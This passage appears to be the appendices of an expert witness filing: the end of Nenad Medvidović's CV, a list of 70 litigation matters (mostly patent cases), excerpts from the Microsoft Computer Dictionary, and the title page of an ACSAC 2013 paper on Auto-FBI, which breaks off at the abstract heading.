**S293** Engineering Faculty Council (EFC), Viterbi School of Engineering, USC (1/02 - 5/05, 8/06 - 5/10)

**S294** New Building Faculty Advisory Committee, Viterbi School of Engineering, USC (1/10 - 3/14)

**S295** EFC Academic Senate Alternate, USC (8/08 - 8/09)

**S296** Appointments, Promotions, and Tenure (APT) Committee, Viterbi School of Engineering, USC (8/08 - 5/10)

**S297** Ph.D. Admissions Committee, Computer Science Department, USC (8/04 - 5/05, 8/07 - 8/15)

**S298** Ph.D. Fellowships Committee, Computer Science Department, USC (8/07 - 8/15)

**S299** Group Leader, Software Systems and Engineering, Computer Science Department, USC (8/08 - 8/10)

**S300** Chair, Faculty Hiring Committee, Computer Science Department, USC (8/08 - 5/09)

**S301** Chair's Advisory Committee, Computer Science Department, USC (8/07 - 7/08)

**S302** Merit Review Committee, Computer Science Department, USC (2000, 2004, 2008, 2010)

**S303** Provost/Academic Senate Committee on Information Services, USC (8/06 - 5/08)

**S304** Dean/EFC Standing Committee on Best Practices, USC (1/08 - 8/08)

**S305** Dean/EFC Standing Committee on Faculty Recruitment and Retention, Viterbi School of Engineering, USC (8/07 - 8/08)

**S306** EFC Research Committee, Viterbi School of Engineering, USC (1/07 - 8/07, 1/10 - 5/10)

**S307** Chair, Interaction Group, Computer Science Department, USC (8/06 - 8/07)

**S308** Chair, EFC Merit Review Committee, Viterbi School of Engineering, USC (8/06 - 8/08)

**S309** Qualifying Exam Timeline Committee, Computer Science Department, USC (4/06 - 5/07)

**S310** M.S. Program Review Committee, Computer Science Department, USC (12/03 - 5/05)

**S311** Research Faculty Hiring Committee, Computer Science Department, USC (2002, 2003, 2006, 2007, 2008)

**S312** Dean's Evaluation Committee, School of Engineering, USC (11/04 - 1/05)

**S313** M.S. Program Review Committee, School of Engineering, USC (9/03 - 12/03)

**S314** Faculty Hiring Committee, Computer Science Department, USC (2001, 2004)

**S315** Interview Panel, Trustee Scholarship, School of Engineering, USC (3/02, 3/04)

**S316** EFC Committee on Research Faculty Rights and Responsibilities, School of Engineering, USC (11/02 - 5/03)

**S317** Chair, Computer Systems Group, Computer Science Department, USC (12/99 - 5/02)

**S318** College of Engineering Commencement Marshal, USC (2000, 2002)

**S319** Industrial Liaison Committee, Computer Science Department, USC (2000)

## 14 Professional Associations

- Association for Computing Machinery (ACM)
- ACM Special Interest Group on Software Engineering (SIGSOFT)
- Institute of Electrical and Electronics Engineers (IEEE)
- IEEE Computer Society (CS)

## 15 Consulting

- 2010 - present Expert witness in multiple legal matters involving software technology
- 2/11 - present Aerospace Corporation, El Segundo, CA
- 6/00 - 6/03 Jet Propulsion Laboratory (JPL), Pasadena, CA

# APPENDIX B

**NENAD MEDVIDOVIĆ** **LITIGATION-RELATED EXPERIENCE**
**(I was retained by the underlined parties)**

1. **Wapp Tech Limited Partnership et al vs. Apple Inc. et al.** (retained by Capital One)
   Type of Matter: Patent infringement
   Services Provided: Declaration
   Law Firm Latham & Watkins LLP

2. **Cyandia, Inc. vs. SAP America, Inc., and SAP SE**
   Type of Matter: Patent infringement
   Services Provided: Expert report, deposition
   Law Firm: Herbert, Smith, Freehills, Kramer (US) LLP
   (formerly Kramer Levin Naftalis & Frankel LLP)

3. **BrowserKey, LLC vs. Charles Schwab Corp. and Charles Schwab & Co., Inc.**
   Type of Matter: Patent infringement
   Services Provided: Declarations
   Law Firm: Greenberg Traurig LLP

4. **Headwater Research, LLC vs. AT&T Services, Inc., AT&T Mobility, LLC and AT&T Corp.**
   Type of Matter: Patent infringement
   Services Provided: Expert report, deposition; case settled
   Law Firm: McKool Smith

5. **NTECH Properties, Inc. vs. ByteDance Ltd. et al.**
   Type of Matter: Patent infringement
   Services Provided: Preliminary document review
   Law Firm: Kramer Levin Naftalis & Frankel LLP

6. **AlmondNet, Inc. and Intent IQ, LLC vs. Viant Technology LLC**
   Type of Matter: Patent infringement
   Services Provided: Preliminary document review
   Law Firm: Fish & Richardson P.C.

7. **Giesecke & Devrient GmbH vs. United States**
   Type of Matter: Patent infringement
   Services Provided: Document, source code review
   Law Firm: Baker & McKenzie LLP

8. **Dorsata, Inc. vs. AthenaHealth Group, Inc. and Unified Women's Healthcare, L.P.**
   Type of Matter: Trade secret
   Services Provided: Expert report; case settled
   Law Firm: Nixon Peabody LLP

**9. Equifax Fair Credit Reporting Act Litigation**
Type of Matter: Class action
Services Provided: Preliminary document review
Law Firm: Gibbs Law Group LLP

**10. Video Solutions Pte. Ltd. vs. Cisco Systems, Inc.**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition
Law Firm: Barnes & Thornburg LLP

**11. Mobile Data Technologies LLC vs. Meta Platforms, Inc. et al.**
Type of Matter: Inter-partes patent reexamination
Services Provided: Declaration, deposition
Law Firm: Bochner PLLC

**12. Quantum Imaging LLC vs. Sony Interactive Entertainment Inc., Sony Interactive Entertainment LLC, and Bluepoint Games, Inc.**
Type of Matter: Patent infringement
Services Provided: Declarations, deposition
Law Firm: Spencer Fane LLP; Bochner PLLC

**13. Acceleration Bay, LLC vs. Amazon Web Services, Inc.**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition, trial testimony
Law Firm: Kramer Levin Naftalis & Frankel LLP

**14. Dynapass IP Holdings LLC vs. Charles Schwab Corp. and Charles Schwab Bank, SSB**
Type of Matter: Patent infringement
Services Provided: Expert report; case settled
Law Firm: Greenberg Traurig LLP

**15. OpenText Corp. / Webroot, Inc. vs. Sophos Ltd.; CrowdStrike, Inc.; TrendMicro, Inc.; Forcepoint, LLC; Kasperksy Total Security, and related entities**
Type of Matter: Inter-partes patent reexamination
Services Provided: Declarations, deposition
Law Firm: King & Spalding LLP

**16. K.Mizra, LLC vs. Cisco Systems, Inc.**
Type of Matter: Patent Infringement
Services Provided: Expert report, deposition; case settled
Law Firm: Sheridan Ross PC

**17. IPA Technologies, Inc. vs. Microsoft Corp.**
Type of Matter: Patent infringement
Services Provided: Expert reports (infringement and validity), depositions, trial testimony
Law Firm: Skiermont Derby LLP

**18. Finjan, Inc. vs. Eset, LLC**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition
Law Firm: Fish & Richardson P.C.

**19. Certain Computer Network Security Equipment & Systems:**
**Centripetal Networks, Inc. vs. Keysight Technologies, Inc. (ITC)**
Type of Matter: Patent infringement, domestic industry
Services Provided: Declaration, expert report, deposition, ALJ trial testimony
Law Firm: Kramer Levin Naftalis & Frankel LLP

**20. Sunstone Information Defense, Inc. vs. International Business Machines Corp.**
Type of Matter: Patent Infringement
Services Provided: Expert report, deposition, trial testimony
Law Firm: Dickinson Wright PLLC

**21. RF Cyber Corp. vs. Samsung Electronics America, Inc. and Samsung Electronics Co., Ltd.**
Type of Matter: Patent Infringement
Services Provided: Expert reports (invalidity and non-infringement), depositions; case settled
Law Firm: Greenberg Traurig LLP

**22. CA, Inc. and Avago Technologies International Sales Pte., Ltd. vs. Netflix, Inc.**
Type of Matter: Patent Infringement
Services Provided: Declaration, expert reports (infringement and validity), deposition
Law Firm: Holland & Knight LLP

**23. Kadima Ventures, LLC vs. ShiftPixy, Inc. and ShiftPixy, Inc. vs. Kadima Ventures, LLC**
Type of Matter: Breach of contract
Services Provided: Expert report, deposition, bench trial testimony
Law Firm: Osborn Maledon

**24. K. Mizra, LLC**
Type of Matter: Inter-partes patent reexamination
Services Provided: Declarations, depositions
Law Firm: Folio Law Group, PLLC

**25. Freshub, Inc. and Freshub, Ltd. vs. Amazon, Inc., Amazon Digital Services, LLC, Prime Now, LLC, and Whole Foods Market, Inc.**
Type of Matter: Patent infringement
Services Provided: Declaration, expert report, deposition, trial testimony
Law Firm: Kramer Levin Naftalis & Frankel LLP

**26. IPA Technologies, Inc. vs. Amazon.com, Inc., Amazon Digital Services, LLC**
Type of Matter: Patent infringement
Services Provided: Expert reports (infringement and validity), depositions
Law Firm: Skiermont Derby LLP

**27. Ericsson, Inc. vs. Samsung Electronics Co., Ltd.**
Type of Matter: Patent Infringement
Services Provided: Preliminary document analysis; case settled
Law Firm: Kirkland & Ellis LLP

**28. Kevin Halpern vs. Uber Technologies, Inc., et al.**
Type of Matter: Trade Secret
Services Provided: None to date
Law Firm: Durie Tangri LLP

**29. Finjan, Inc. vs. Palo Alto Networks, Inc.**
Type of Matter: Patent infringement
Services Provided: Preliminary document review
Law Firm: Fish & Richardson, P.C.

**30. Sound View Innovations, LLC vs. Delta Air Lines, Inc.**
Type of Matter: Patent infringement
Services Provided: Document, source code analysis; case dismissed
Law Firm: King & Spalding LLP

**31. Finjan, Inc. vs. SonicWall, Inc.**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition
Law Firm: Fish & Richardson, P.C.

**32. Finjan, Inc. vs. Rapid7, Inc. and Rapid7, LLC**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition
Law Firm: Fish & Richardson, P.C.

**33. Finjan, Inc. vs. Qualys, Inc.**
Type of Matter: Patent infringement
Services Provided: Technology tutorial in court, expert report, deposition
Law Firm: Fish & Richardson, P.C.

**34. Centripetal Networks, Inc. vs. Cisco Systems, Inc.**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition, bench trial testimony
Law Firm: Kramer Levin Naftalis & Frankel LLP

**35. Uniloc 2017, LLC vs. Samsung Electronics America, Inc. and Samsung Electronics Co., Ltd.**
Type of Matter: Patent infringement
Services Provided: Claim construction declaration, expert report, deposition; case settled
Law Firm: Greenberg Traurig LLP

**36. <u>Finjan, Inc.</u> vs. Cisco Systems, Inc.**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition
Law Firm: Fish & Richardson, P.C.

**37. <u>IPA Technologies, Inc.</u>**
Type of Matter: Inter-partes patent reexamination
Services Provided: Declaration, deposition
Law Firm: Skiermont Derby LLP

**38. Air Crash of N51RX**
Type of Matter: Arbitration
Services Provided: Expert report, deposition; case settled
Law Firm: Stepp & Sullivan, PC

**39. <u>CUPP Cybersecurity, LLC</u>**
Type of Matter: Inter-partes patent reexamination
Services Provided: Declaration, deposition
Law Firm: Kramer Levin Naftalis & Frankel LLP

**40. <u>Roku, Inc.</u>**
Type of Matter: Inter-partes patent reexamination
Services Provided: Declaration
Law Firm: Haynes and Boone, LLP

**41. <u>Finjan, Inc.</u> vs. Bitdefender, Inc. and Bitdefender, SRL**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition; case settled
Law Firm: Kramer Levin Naftalis & Frankel LLP

**42. <u>Finjan, Inc.</u> vs. Juniper Networks, Inc.**
Type of Matter: Patent infringement
Services Provided: Expert report
Law Firm: Kramer Levin Naftalis & Frankel LLP

**43. Uniloc USA, Inc. and Uniloc Luxembourg, S.A. vs. <u>Samsung Electronics America, Inc. and Samsung Electronics Co., Ltd.</u>**
Type of Matter: Patent infringement (invalidity and non-infringement)
Services Provided: Expert reports, deposition; complaint withdrawn
Law Firm: Greenberg Traurig LLP

**44. <u>Finjan, Inc.</u> vs. Eset, LLC**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition
Law Firm: Kramer Levin Naftalis & Frankel LLP

45. **CUPP Cybersecurity, LLC vs. Trend Micro, Inc.**
Type of Matter: Patent infringement
Services Provided: Claim construction declaration, deposition
Law Firm: Kramer Levin Naftalis & Frankel LLP

46. **Centripetal Networks, Inc. vs. Keysight Technologies, Inc. and IXIA**
Type of Matter: Patent infringement
Services Provided: Declaration, expert report, deposition, jury trial testimony
Law Firm: Kramer Levin Naftalis & Frankel LLP

47. **SmarTEN, LLC vs. Samsung Electronics America, Inc.**
Type of Matter: Patent infringement
Services Provided: Preliminary document analysis; case dismissed
Law Firm: Covington & Burling LLP

48. **Finjan, Inc. vs. Blue Coat Systems, Inc. II**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition, jury trial testimony, jury re-trial testimony
Law Firm: Kramer Levin Naftalis & Frankel LLP

49. **Apple, Inc.**
Type of Matter: Inter-partes patent reexamination
Services Provided: Declaration
Law Firm: Haynes and Boone, LLP

50. **Complete Entertainment Resources, LLC d/b/a Songkick vs. Live Nation Entertainment, Inc., and Ticketmaster, LLC**
Type of Matter: Trade Secret
Services Provided: Source code review
Law Firm: Latham & Watkins LLP

51. **Finjan, Inc. vs. Proofpoint, Inc. and Armorize Technologies, Inc.**
Type of Matter: Patent infringement
Services Provided: Expert Report, technology tutorial in court, deposition
Law Firm: Kramer Levin Naftalis & Frankel LLP

52. **Finjan, Inc. vs. Sophos, Inc.**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition, jury trial testimony
Law Firm: Kramer Levin Naftalis & Frankel LLP

53. **Front Row Technologies, LLC, vs. NBA Media Ventures, LLC; GBTV, LLC; Mercury Radio Arts, Inc.; Premiere Radio Networks, Inc.; & MLB Advanced Media, L.P.**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition
Law Firm: Shore Chan DePumpo LLP

**54. Cascades Computer Innovations, LLC vs. Motorola Mobility, LLC and Samsung Electronics Co., LTD**
Type of Matter: Patent infringement (invalidity and non-infringement)
Services Provided: Expert report, deposition, jury trial testimony, jury re-trial testimony
Law Firm: Kirkland & Ellis LLP

**55. Acceleration Bay, LLC vs. Activision Blizzard, Inc.; Electronic Arts, Inc; Take-Two Interactive Software, Inc.; Rockstar Games, Inc.; & 2K Sports, Inc.**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition, trial testimony
Law Firm: Kramer Levin Naftalis & Frankel LLP

**56. Finjan, Inc. vs. Symantec Corp.**
Type of Matter: Patent infringement
Services Provided: Declaration, technology tutorial in court, expert report, deposition
Law Firm: Kramer Levin Naftalis & Frankel LLP

**57. Finjan, Inc. vs. Blue Coat Systems, Inc.**
Type of Matter: Patent infringement
Services Provided: Declaration, deposition, technology tutorial in court, jury trial testimony
Law Firm: Kramer Levin Naftalis & Frankel LLP

**58. Cascades Computer Innovations, LLC vs. HTC Corp. and LG Electronics, Inc.**
Type of Matter: Patent infringement (invalidity)
Services Provided: Expert report, deposition; case settled
Law Firm: Wilson Sonsini Goodrich & Rosati LLP

**59. Intellectual Ventures, LLC vs. AT&T Mobility, LLC; New Cingular Wireles Services, Inc.; SBC Internet Services, Inc.; Wayport, Inc.; T-Mobile USA, Inc.; Nextel Operations, Inc.; Sprint Spectrum L.P.; U.S. Cellular Corp.**
Type of Matter: Patent infringement
Services Provided: Review of public documents
Law Firm: Dechert LLP

**60. Enterprise Systems Technologies vs. Samsung Electronics Co., LTD**
Type of Matter: Patent infringement
Services Provided: Expert report, deposition; case settled
Law Firm: Covington & Burling LLP

**61. Axure Software Solutions, Inc. vs. iRise, Inc.**
Type of Matter: Patent infringement
Services Provided: Expert report; case settled
Law Firm: Haynes and Boone, LLP

**62. <u>Nokia Corp.</u> vs. HTC Corp. and HTC America, Inc.**

| | |
|---|---|
| Type of Matter: | Patent infringement |
| Services Provided: | Document review, code review; case settled |
| Law Firm: | Desmarais LLP |

**63. <u>Finjan, Inc.</u>**

| | |
|---|---|
| Type of Matter: | Ex parte patent reexamination |
| Services Provided: | Testified at USPTO |
| Law Firm: | Kramer Levin Naftalis & Frankel LLP |

**64. Flash Point Technology, Inc., vs. <u>ZTE Corp. and ZTE (USA), Inc</u>.**

| | |
|---|---|
| Type of Matter: | Patent infringement |
| Services Provided: | Expert report, deposition, ITC trial testimony |
| Law Firm: | Goodwin Procter LLP |

**65. <u>Finjan, Inc</u>. vs. Symantec Corp.**

| | |
|---|---|
| Type of Matter: | Patent infringement and (partially) validity |
| Services Provided: | Expert report, deposition, jury trial testimony |
| Law Firm: | Kramer Levin Naftalis & Frankel LLP |

**66. <u>Finjan, Inc</u>. vs. Websense, Inc.**

| | |
|---|---|
| Type of Matter: | Patent infringement |
| Services Provided: | Expert report, deposition, jury trial testimony |
| Law Firm: | Kramer Levin Naftalis & Frankel LLP |

**67. <u>M86 Security, Inc.</u>**

| | |
|---|---|
| Type of Matter: | Inter partes patent reexamination |
| Services Provided: | Declaration |
| Law Firm: | Kramer Levin Naftalis & Frankel LLP |

**68. j2 Global Communications, Inc. vs. <u>Easylink Services Int'l Corp.</u>**

| | |
|---|---|
| Type of Matter: | Patent infringement |
| Services Provided: | Document review; case suspended |
| Law Firm: | King & Spalding LLP (until 10/12) & Perkins Coie LLP (after 10/12) |

**69. <u>Gabriel Technologies Corp</u>. vs. Qualcomm Inc., Snaptrack, Inc., and Norman Krasner**

| | |
|---|---|
| Type of Matter: | Trade secret |
| Services Provided: | Expert report, deposition; case on appeal after court ruling |
| Law Firm: | Hughes Hubbard & Reed LLP |

**70. Marla Tidenberg and others vs. <u>Bidz.com, Inc.</u>**

| | |
|---|---|
| Type of Matter: | Class action |
| Services Provided: | Expert report; case settled after source code review |
| Law Firm: | Gordon & Rees LLP |

# APPENDIX C

Microsoft

OVER 10,000 ENTRIES

# Microsoft Computer Dictionary

## Fifth Edition

- *Fully updated with the latest technologies, terms, and acronyms*
- *Easy to read, expertly illustrated*
- *Definitive coverage of hardware, software, the Internet, and more!*

PUBLISHED BY
Microsoft Press
A Division of Microsoft Corporation
One Microsoft Way
Redmond, Washington 98052-6399

Copyright © 2002 by Microsoft Corporation

All rights reserved. No part of the contents of this book may be reproduced or transmitted in any form or by any means without the written permission of the publisher.

Library of Congress Cataloging-in-Publication Data
Microsoft Computer Dictionary.--5th ed.
p. cm.
ISBN 0-7356-1495-4
1. Computers--Dictionaries. 2. Microcomputers--Dictionaries.

AQ76.5. M52267 2002
004'.03--dc21 200219714

Printed and bound in the United States of America.

2 3 4 5 6 7 8 9 QWT 7 6 5 4 3 2

Distributed in Canada by H.B. Fenn and Company Ltd.

A CIP catalogue record for this book is available from the British Library.

Microsoft Press books are available through booksellers and distributors worldwide. For further information about international editions, contact your local Microsoft Corporation office or contact Microsoft Press International directly at fax (425) 936-7329. Visit our Web site at www.microsoft.com/mspress. Send comments to *mspinput@microsoft.com*.

Active Desktop, Active Directory, ActiveMovie, ActiveStore, ActiveSync, ActiveX, Authenticode, BackOffice, BizTalk, ClearType, Direct3D, DirectAnimation, DirectDraw, DirectInput, DirectMusic, DirectPlay, DirectShow, DirectSound, DirectX, Entourage, FoxPro, FrontPage, Hotmail, IntelliEye, IntelliMouse, IntelliSense, JScript, MapPoint, Microsoft, Microsoft Press, Mobile Explorer, MS-DOS, MSN, Music Central, NetMeeting, Outlook, PhotoDraw, PowerPoint, SharePoint, UltimateTV, Visio, Visual Basic, Visual C++, Visual FoxPro, Visual InterDev, Visual J++, Visual SourceSafe, Visual Studio, Win32, Win32s, Windows, Windows Media, Windows NT, Xbox are either registered trademarks or trademarks of Microsoft Corporation in the United States and/or other countries. Other product and company names mentioned herein may be the trademarks of their respective owners.

The example companies, organizations, products, domain names, e-mail addresses, logos, people, places, and events depicted herein are fictitious. No association with any real company, organization, product, domain name, e-mail address, logo, person, place, or event is intended or should be inferred.

**Acquisitions Editor:** Alex Blanton
**Project Editor:** Sandra Haynes

Body Part No. X08-41929

## Contributors

Peter Aiken
Bart Arenson
Janice Borzendowski
Jerome Colburn
Duane Hanson
Andrew Himes
Robert Howecton
Annette B. Jackson
Larry S. Jackson
Thomas A. Jackson
Chris Kinata
Ilana Kingsley
Robin Lombard
Thomas A. Long
William G. Madison
Thomas P. Magliery
David Mason
Terrence M. McLaren
Wallace Parker
Charles Petzold
Phil Rose
John Ross
David Rygmyr
Aimée Truchard
Michael Vose
Bruce Webster
Judson D. Weeks
Tom Winn
JoAnne Woodcock

## Illustrators

Travis Beaven
David Holter
Alton Lawson
Rob Nance
Joel Panchot

**computer-readable** *adj.* Of, pertaining to, or characteristic of information that can be interpreted and acted on by a computer. Two types of information are referred to as computer-readable: bar codes, magnetic tape, magnetic-ink characters, and other formats that can be scanned in some way and read as data by a computer; and machine code, the form in which instructions and data reach the computer's microprocessor.

**computer revolution** *n.* The societal and technological phenomenon involving the swift development and widespread use and acceptance of computers—specifically single-user personal computers. The impact of these machines is considered revolutionary for two reasons. First, their appearance and success were rapid. Second, and more important, their speed and accuracy produced a change in the ways in which information can be processed, stored, and transferred.

**computer science** *n.* The study of computers, including their design, operation, and use in processing information. Computer science combines both theoretical and practical aspects of engineering, electronics, information theory, mathematics, logic, and human behavior. Aspects of computer science range from programming and computer architecture to artificial intelligence and robotics.

**computer security** *n.* The steps taken to protect a computer and the information it contains. On large systems or those handling financial or confidential data, computer security requires professional supervision that combines legal and technical expertise. On a microcomputer, data protection can be achieved by backing up and storing copies of files in a separate location, and the integrity of data on the computer can be maintained by assigning passwords to files, marking files read-only to avoid changes to them, physically locking a hard disk, storing sensitive information on floppy disks kept in locked cabinets, and installing special programs to protect against viruses. On a computer that many people have access to, security can be maintained by requiring personnel to use passwords and by granting only approved users access to sensitive information. *See also* bacterium, encryption, virus.

**computer simulation** *n. See* simulation.

**computer system** *n.* The configuration that includes all functional components of a computer and its associated hardware. A basic microcomputer system includes a console, or system unit, with one or more disk drives, a monitor, and a keyboard. Additional hardware, called *peripherals*, can include such devices as a printer, a modem, and a mouse. Software is usually not considered part of a computer system, although the operating system that runs the hardware is known as system software.

**computer telephone integration** *n.* A process allowing computer applications to answer incoming calls, provide database information on-screen at the same time the call comes in, automatically route and reroute calls by drag-and-drop, automatically dial and speed-dial outgoing calls from a computer-resident database, and identify incoming customer calls and transfer them to predetermined destinations. *See also* drag-and-drop.

**Computer Telephony Expo** *n. See* CT Expo.

**computer typesetting** *n.* Typesetting operations that are partially or totally controlled by computers. Partial control can involve the transmittal of text directly from the source to the typesetter, without a paste-up stage. Full computerization can include the digitization of all graphics, which would then also be transmitted directly to the typesetter and regenerated without paste-up.

**computer users' group** *n. See* user group.

**computer utility** *n. See* utility.

**computer virus** *n. See* virus.

**computer vision** *n.* The processing of visual information by a computer. Computer vision is a form of artificial intelligence that creates a symbolic description of images that are generally input from a video camera or sensor in order to convert the images to digital form. Computer vision is often associated with robotics. *Acronym:* CV. *See also* artificial intelligence, robotics.

**Computer Vision Syndrome** *n.* A change in a user's vision caused by prolonged exposure to computer monitors. Symptoms of Computer Vision Syndrome (CVS) can include blurred vision, dry, burning eyes, focusing problems, and headaches. CVS may be controlled with regular breaks from the computer, use of monitor filters or color adjustments, or adjustments to eyeglass prescriptions. *Acronym:* CVS.

**COM recorder** *n.* Short for **c**omputer **o**utput **m**icrofilm **recorder**. A device that records computer information on microfilm.

**COMSAT** *n. See* Communication Satellite Corporation.

**CON** *n.* The logical device name for *console*; reserved by the MS-DOS operating system for the keyboard and the screen. The input-only keyboard and the output-only

**opt-out** *vb.* To choose not to receive certain services or features offered by an e-business. Some e-businesses automatically enroll users in a predetermined range of services, but allow users to opt-out of features in which they do not choose to participate.

**OR** *n.* A logical operation for combining two bits (0 or 1) or two Boolean values (false or true). If one or both values are 1 (true), it returns the value 1 (true). See the table.

*Table O.2 The results of the OR logical operation.*

| *a* | *b* | *a OR b* |
|---|---|---|
| 0 | 0 | 0 |
| 0 | 1 | 1 |
| 1 | 0 | 1 |
| 1 | 1 | 1 |

**Orange Book** *n.* **1.** A U.S. Department of Defense standards document entitled "Trusted Computer System Evaluation Criteria, DOD standard 5200.28-STD, December, 1985," which defines a system of ratings from A1 (most secure) to D (least secure), indicating the ability of a computer system to protect sensitive information. *Compare* Red Book (definition 1). **2.** A specifications book written by the Sony and Philips Corporations, covering the compact disc write-once formats (CD-R, PhotoCD). *See also* CD-R, ISO 9660, PhotoCD. *Compare* Green Book, Red Book (definition 2).

**ORB** *n.* Acronym for **o**bject **r**equest **b**roker. In client/server applications, an interface to which the client makes a request for an object. The ORB directs the request to the server containing the object and then returns the resulting values to the client. *See also* client (definition 1), CORBA.

**order[1]** *n.* **1.** In computing, the relative significance of a digit or byte. *High-order* refers to the most significant (usually leftmost) digit or byte; *low-order* refers to the least significant (usually rightmost) digit or byte. **2.** The magnitude of a database in terms of the number of fields it contains. **3.** The sequence in which arithmetic operations are performed.

**order[2]** *vb.* To arrange in a sequence, such as alphabetic or numeric.

**ordinal number** *n.* A number whose form indicates position in an ordered sequence of items, such as first, third, or twentieth. *Compare* cardinal number.

**.org** *n.* In the Internet's Domain Name System, the top-level domain that identifies addresses operated by organizations that do not fit any of the other standard domains. For instance, the Public Broadcasting System (PBS) is neither a commercial, for-profit corporation (.com) nor an educational institution with enrolled students (.edu), so it has the Internet address pbs.org. The designation .org appears at the end of the address. *See also* DNS (definition 1), domain (definition 3). *Compare* .com, .edu, .gov, .mil, .net.

**Organic Light-Emitting Device** *n. See* OLED.

**Organization for the Advancement of Structured Information Standards** *n. See* OASIS.

**OR gate** *n.* One of the three basic logic gates (with AND and NOT) from which all digital systems can be built. The output of an OR circuit is true (1) if any input is true. *See also* AND gate, gate (definition 1), NOT gate.

**orientation** *n. See* landscape mode, portrait mode.

**original equipment manufacturer** *n.* The maker of a piece of equipment. In making computers and related equipment, manufacturers of original equipment typically purchase components from other manufacturers of original equipment, integrate them into their own products, and then sell the products to the public. *Acronym:* OEM. *Compare* value-added reseller.

**original Macintosh keyboard** *n.* The keyboard supplied as standard equipment with the 128-KB Apple Macintosh and the Mac 512K. The original Macintosh keyboard is small and has no numeric keypad or function keys. Also, because the overall design goal was that the Macintosh should feel familiar, the only elements of this 58-key keyboard that differ from a typewriter keyboard are the Option keys at both ends of the bottom row, the Command key to the left of the Spacebar, and the Enter key to the right of the Spacebar.

**orphan** *n.* The first line of a paragraph printed alone at the bottom of a page or column of text, or the last line of a paragraph printed alone at the top of a page or column. Orphans are visually unattractive and thus undesirable in printed materials. *Compare* widow.

**orphan file** *n.* A file that remains on a system after it has ceased to be of use. For example, a file may be created to support a particular application but may remain after the application has been removed.

**OS** *n. See* operating system.

**OS/2** *n.* Short for **O**perating **S**ystem/**2**. A protected-mode, virtual-memory, multitasking operating system for personal computers based on the Intel 80286, 80386, i486, and Pentium processors. OS/2 can run most MS-DOS

unit of elements, or the elements can be accessed individually. *See also* array, data structure, type[1] (definition 1).

**record²** *vb.* To retain information, usually in a file.

**record format** *n. See* record structure.

**record head** *n.* The device in a tape machine that places data on the tape. In some tape machines, the record head is combined with the read head.

**record layout** *n.* The organization of data fields within a record. *See also* record[1].

**record length** *n.* The amount of storage space required to contain a record, typically given in bytes. *See also* record[1].

**record locking** *n.* A strategy employed in distributed processing and other multiuser situations to prevent more than one user at a time from writing data to a record. *See also* record[1].

**record number** *n.* A unique number assigned to a record in a database in order to identify it. A record number can identify an existing record by its position (for example, the tenth record from the beginning of a database), or it can be assigned to the record to serve as a key (for example, the number 00742 assigned to the tenth record from the beginning of the database). *See also* record[1].

**record structure** *n.* An ordered list of the fields that compose a record, together with a definition of the domain (acceptable values) of each field. *See also* record[1].

**recover** *vb.* **1.** To return to a stable condition after some error has occurred. A program recovers from an error by stabilizing itself and resuming execution of instructions without user intervention. **2.** To put back into a stable condition. A computer user may be able to recover lost or damaged data by using a program to search for and salvage whatever information remains in storage. A database may be recovered by restoring its integrity after some problem has damaged it, such as abnormal termination of the database management program.

**recoverable error** *n.* An error that can be successfully managed by software. For example, when the user enters a number when a letter is required, the program can simply display an error message and prompt the user again.

**recovery** *n.* The restoration of lost data or the reconciliation of conflicting or erroneous data after a system failure. Recovery is often achieved using a disk or tape backup and system logs. *See also* backup.

**Recreational Software Advisory Council** *n.* An independent, nonprofit organization established in the fall of 1994 by a group of six trade organizations, led by the Software Publishers Association. The Council's goal was to create a new, objective content-labeling rating system for recreational software and other media such as the Internet. *Acronym:* RSAC.

**rectangle ad** *n.* An Internet ad format that is larger than a traditional banner ad and is generally inserted directly into page content for greater visibility.

**rectifier** *n.* A circuit component that passes current flowing in one direction but stops current flowing in the other direction. Rectifiers are used to convert alternating current to direct current.

**recto** *n.* The right-hand page of two facing pages. A recto is characteristically an odd-numbered page. *Compare* verso.

**recursion** *n.* The ability of a routine to call itself. Recursion enables certain algorithms to be implemented with small, simple routines, but it does not guarantee speed or efficiency. Erroneous use of recursion can cause a program to run out of stack space during execution, causing the program, and sometimes the entire system, to crash. *See also* call[1] (definition 2), routine.

**Recycle Bin** *n.* A folder in Windows 9x, Windows CE, Windows NT, Windows 2000, and Windows XP represented by an icon on the screen resembling a basket decorated with the recycling logo. To remove a file, the user drags its icon to the Recycle Bin. However, a file in the Recycle Bin is not actually deleted from the disk until the user opens the Recycle Bin, selects the file, and presses the Delete key; until then, the user can retrieve it. *Compare* Trash.

**Red Book** *n.* **1.** The standards documents of the U.S. National Security Agency entitled "Trusted Network Interpretation of the Trusted Computer System Evaluation Criteria (NCSC-TG-005)" and "Trusted Network Interpretation (NCS-TG-011)." These documents define a system of ratings from A1 (most secure) to D (nonsecure), indicating the ability of a computer network to protect sensitive information. *Compare* Orange Book (definition 1). **2.** A specifications book written by the Sony Corporation and Philips Corporation and endorsed by ISO, covering audio compact discs. *Compare* Green Book, Orange Book (definition 2). **3.** Telecommunications standards published by the CCITT.

**red-green-blue** *n. See* RGB.

# APPENDIX D

Check for updates

ACM DIGITAL LIBRARY Association for Computing Machinery acm open

Latest updates: https://dl.acm.org/doi/10.1145/2523649.2523683

RESEARCH-ARTICLE

# Auto-FBI: a user-friendly approach for secure access to sensitive content on the web

**MOHSEN ZOHREVANDI**, Arizona State University, Tempe, AZ, United States

**RIDA ADNAN BAZZI**, Arizona State University, Tempe, AZ, United States

**Open Access Support** provided by:

**Arizona State University**

**PDF Download**
**2523649.2523683.pdf**
**08 January 2026**
**Total Citations:** 4
**Total Downloads:** 329

**Published:** 09 December 2013

Citation in BibTeX format

ACSAC '13: Annual Computer Security Applications Conference
*December 9 - 13, 2013*
*Louisiana, New Orleans, USA*

# Auto-FBI: A User-friendly Approach for Secure Access to Sensitive Content on the Web

Mohsen Zohrevandi Rida A. Bazzi*

Arizona State University
699 S. Mill Ave.
Tempe, AZ, USA
{mzohreva, bazzi}@asu.edu

## ABSTRACT

